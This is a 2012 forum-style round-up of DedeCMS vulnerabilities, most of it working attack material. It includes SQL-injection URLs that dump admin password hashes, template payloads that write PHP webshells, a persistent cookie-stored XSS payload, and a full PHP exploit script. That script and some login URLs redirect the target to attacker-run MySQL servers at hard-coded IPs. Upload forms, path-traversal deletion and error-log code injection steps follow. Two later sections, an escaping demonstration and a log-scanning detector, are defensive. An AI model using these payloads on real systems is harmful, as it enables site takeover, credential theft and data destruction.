DedeCMS vulnerability round-up

Posted 2012-10-18 10:42:14 by the original poster (楼主)

DedeCMS 5.6 rss.php SQL injection

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

Error-based injection through the _Cs[] array parameter: the updatexml() error message carries [uname:hash] for the admin account. MID(pwd,4,16) skips the first three characters of the stored 20-character pwd value, which leaves exactly the 16-character MD5 fragment (see the note on the dumped hash under advancedsearch.php further down).

DedeCMS v5.6 embedded malicious code execution

Register a member account and upload a "software" item. In the local-address field enter:
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php, a one-line shell with password xiao (the two base64 strings decode to x.php and <?php eval($_POST[xiao])?>baidu).

DedeCMS 5.6 GBK SQL injection

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
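The post gives only probe URLs for this one and does not say how member/index.php reaches the vulnerable query. As an added example (not code from the post or from DedeCMS), the script below shows the general mechanism behind a "GBK SQL injection", the same trick the %cf' prefix in the infosearch.php payload at the end of this round-up relies on: a byte-level escaper such as addslashes()/magic_quotes inserts a backslash before the quote, a GBK-decoding MySQL connection then reads the lead byte 0xBF plus that backslash (0x5C) as one two-byte character, and the quote is left bare. The query shape and the probe bytes are constructed for the demonstration.

```python
# Added example, not from the original post: why byte-level escaping fails
# when MySQL decodes the connection as GBK (the "wide-byte" injection).

def addslashes_bytes(raw: bytes) -> bytes:
    """Byte-level escaping in the style of addslashes()/magic_quotes_gpc."""
    out = bytearray()
    for b in raw:
        if b == 0x00:
            out += b"\\0"
            continue
        if b in (0x27, 0x22, 0x5C):   # ' " \
            out += b"\\"
        out.append(b)
    return bytes(out)


def as_mysql_sees_it(escaped: bytes) -> str:
    """Decode the escaped bytes the way a GBK-charset connection does.
    0xBF 0x5C is a valid GBK lead/trail pair, so the backslash disappears
    into a CJK character and the following quote stands alone."""
    return escaped.decode("gbk", errors="replace")


def quote_still_escaped(decoded: str) -> bool:
    """True if every single quote in the decoded text is preceded by a backslash."""
    return all(i > 0 and decoded[i - 1] == "\\"
               for i, ch in enumerate(decoded) if ch == "'")


def escape_after_decoding(raw: bytes) -> str:
    """Charset-aware escaping: decode first, then escape code points.
    A dangling lead byte becomes U+FFFD instead of swallowing the backslash.
    (Parameterised queries make the problem disappear entirely.)"""
    text = raw.decode("gbk", errors="replace")
    return (text.replace("\\", "\\\\")
                .replace("'", "\\'")
                .replace('"', '\\"'))


def build_query(user_field: str) -> str:
    # Query shape assumed for illustration only; not DedeCMS's actual SQL
    return f"SELECT * FROM dede_member WHERE userid='{user_field}'"


# Constructed probe: a GBK lead byte followed by a single quote
PROBE = b"\xbf'"

if __name__ == "__main__":
    naive = as_mysql_sees_it(addslashes_bytes(PROBE))
    print("byte-level escape :", build_query(naive),
          "| quote escaped:", quote_still_escaped(naive))
    safe = escape_after_decoding(PROBE)
    print("decode-then-escape:", build_query(safe),
          "| quote escaped:", quote_still_escaped(safe))
```

With the byte-level escaper the decoded text is a CJK character followed by a bare quote, so the string literal in the query closes early; decoding before escaping (or, better, binding the value as a parameter) keeps the quote escaped.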
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL execution

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

The sql parameter is executed as given; `#@__` is the DedeCMS table-prefix placeholder, so `#@__admin` resolves to dede_admin on a default install and the request dumps the admin table.

DedeCMS (all versions) gotopage parameter XSS

1. Open the URL below; it triggers the XSS and installs a persistent payload (an "XSS rootkit"). IE8/9 block URL-borne XSS, so disable the XSS filter there.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

The String.fromCharCode payload decodes to script that stores the same "><script>...</script><x=" string in a cookie named gotopage with a one-year expiry, which is why the next step fires on every later visit.

2. Close the browser. Whichever of the URLs below you open, the XSS fires again.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable-override getshell

The script posts _COOKIE[GLOBALS][cfg_db*] values to plus/mytag_js.php, which makes it connect to a MySQL server the attacker controls and render the {dede:php} tag stored there (the tag-based remote file write section below shows the row to insert).

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if ($argv[2] == null) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath=/data/cache   aid=2 shellpath=/   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = $argv[3];
$exp  = Getshell($url, $aid, $path);
// $exp is the HTTP status line; "OK" sits at offset 13 of "HTTP/1.1 200 OK"
if (strpos($exp, "OK") > 12) {
    echo "Exploit Success \n";
    if ($aid == 1) echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "Shell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "Shell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "Exploit Failed \n";
}

function Getshell($url, $aid, $path) {
    $id   = $aid;
    $host = $url;
    $port = "80";
    // _COOKIE[GLOBALS][cfg_db*] overrides the database settings; the host,
    // user, password and database below are the ones from the original post
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "No response from ".$host."\n";
        return "";
    }
    fwrite($ock, $data);
    // only the status line is read; that is all the success check needs
    $exp = fgets($ock, 1024);
    fclose($ock);
    return $exp;
}
?>

DedeCMS v5.6-5.7 unauthorised access (straight into the admin back end)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

(织梦网站后台 in the URL stands for the site's admin directory.) Change validate=dcug to the captcha currently shown and you are logged into the back end. This is the same _POST[GLOBALS][cfg_db*] override as the getshell above: the login check runs against the attacker's MySQL server (116.255.183.90 here), where the admin/inimda credentials exist.

Prerequisite: the admin directory path must be known.

DedeCMS tag-based remote file write

Prerequisite: set up your own DedeCMS database and insert this row:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
(The string written to 1.php is empty as the post shows it.)

Then submit the form below; the shell appears as 1.php in the same directory. The _COOKIE[GLOBALS][cfg_db*] fields point plus/mytag_js.php at your database, and the {dede:php} tag in row aid=1 is rendered, which is what writes the file.
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<!-- onsubmit added so the action is taken from the doaction field; the form as posted never called addaction() -->
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution

1. Register a user, go to the member area, post an article and upload an image. Then, under attachment management, replace the image with our crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg

Template content (prepend gif89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just posted, view the page source and build a form like this (the templet and dede_addonfields fields are the crafted part):
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>

<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma-separated)

<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)

<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Choose a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(short description of the content)

<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(the crafted part)
</div>

<!-- form action area -->
<h3 class="meTitle">Body</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value='<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>' style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>

</div>

</form>

Submit; a "modified successfully" message means the template path has been changed.

3. Open the edited article. If its aid is 2, request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is written in the plus directory.

DedeCMS GetShell (5.3/5.6)

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>

Build the form above; after upload the image is stored as /uploads/userup/3/1.gif.
Post an article, then build the edit form as follows (same mechanism as the template-execution bug above: templet points at the uploaded file and dede_addonfields=templet makes the edit accept it):

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Choose a category...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>

DedeCMS V5.6 remote file deletion
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

The oldface path is not confined to the member's upload directory, so ../ reaches any file the web server process can unlink (here member/templets/images/m_logo.gif).

DedeCMS V5.6 plus/carbuyaction.php local file inclusion
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL execution (note on the dumped hash)
The request is the one given above. The pwd column holds a 32-character MD5 with the first 5 and the last 7 characters removed, i.e. a 20-character string; drop 3 more from the front and 1 from the end and you have the 16-character MD5 to crack.

DedeCMS 5.1 feedback_js.php injection
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

The arcurl parameter closes the string and UNION-selects userid and pwd from dede_admin into the feedback output.

DedeCMS select_soft_post.php uninitialised variable vulnerability
With register_globals on, the posted cfg_* fields fill in configuration variables the script never initialises (base directory, allowed file types), so a .php upload into /data/cache/ is accepted.
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exploit for the bug in Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS 5.3-5.5 plus/digg_frame.php injection
It relies on a MySQL numeric-overflow error together with DedeCMS writing database error messages into a PHP file whose top has no guard.
1. Visit:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is shown.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; the following output proves the injection worked (int(3) is var_dump(3) running from the trace file):
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run test.html from dede.rar; note that the form's action is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the step-2 output again means the trojan was uploaded.

DedeCMS plus/infosearch.php injection
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

The %cf byte in front of the quote is the wide-byte trick from the GBK injection listed earlier: on a GBK connection it absorbs the escaping backslash and the quote closes the string.
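As an added example (not code from the original post), here is a detector for the request patterns this round-up collects, run over Apache combined-format access-log lines. The rule names and the sample log lines are constructed for the demonstration; the _COOKIE[GLOBALS] override sent to plus/mytag_js.php travels in a POST body that an access log does not record, so a POST to that script is flagged by path alone.

```python
# Added example, not from the original post: flag the DedeCMS exploitation
# patterns collected above in access logs. Rule names and sample lines are mine.
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# (rule name, regex on the request path or "" for any path, regex on the decoded query)
RULES = [
    ("variable-override", "",
     r"(_cookie|_post|_get|_request)\[globals\]|globals\[cfg_"),
    ("advancedsearch-raw-sql", r"plus/advancedsearch\.php", r"(^|&)sql="),
    ("rss-cs-injection", r"plus/rss\.php", r"(^|&)_cs\["),
    ("gotopage-xss", r"login\.php", r"gotopage=[^&]*<script"),
    ("edit_face-delete-traversal", r"member/edit_face\.php",
     r"dopost=delold.*oldface=[^&]*\.\./"),
    ("select_soft_post-upload", r"dialog/select_soft_post\.php",
     r"cfg_basedir=|cfg_imgtype=|newname="),
    ("digg_frame-errorlog-code", r"plus/digg_frame\.php",
     r"mid=[^&]*(<\?|\?>|eval\()"),
    ("carbuyaction-lfi", r"plus/carbuyaction\.php", r"code=[^&]*\.\./"),
    ("union-select", r"plus/(feedback_js|infosearch)\.php", r"union\s+select"),
]

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify(line: str) -> List[str]:
    """Return the rule names matching one combined-format log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    path, _, query = m.group("target").partition("?")
    # decode twice so %2527-style double encoding does not slip past the rules
    decoded = unquote_plus(unquote_plus(query)).lower()
    hits = [name for name, path_re, q_re in RULES
            if (not path_re or re.search(path_re, path, re.I))
            and re.search(q_re, decoded, re.I | re.S)]
    # The _COOKIE[GLOBALS] override for mytag_js.php is carried in the POST
    # body, which the access log lacks, so flag that endpoint by method + path.
    if m.group("method") == "POST" and re.search(r"plus/mytag_js\.php", path, re.I):
        hits.append("mytag_js-post")
    return hits


def scan(log_text: str) -> Dict[int, List[str]]:
    """Map 1-based line numbers to their matched rules, skipping clean lines."""
    return {n: hits
            for n, hits in ((n, classify(line))
                            for n, line in enumerate(log_text.splitlines(), 1))
            if hits}


# Constructed sample: one line per technique from the post plus a benign request
SAMPLE_LOG = """\
203.0.113.7 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=198.51.100.9 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Oct/2012:10:42:31 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3021 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Oct/2012:10:42:40 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Oct/2012:10:42:55 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 15 "-" "Mozilla/5.0"
198.51.100.3 - - [18/Oct/2012:10:43:02 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(hits)}")
```

The rules key on the endpoint plus the decoded parameter shape rather than on specific payload strings, so encoding variants of the same technique still match; a benign request to plus/view.php produces no hit.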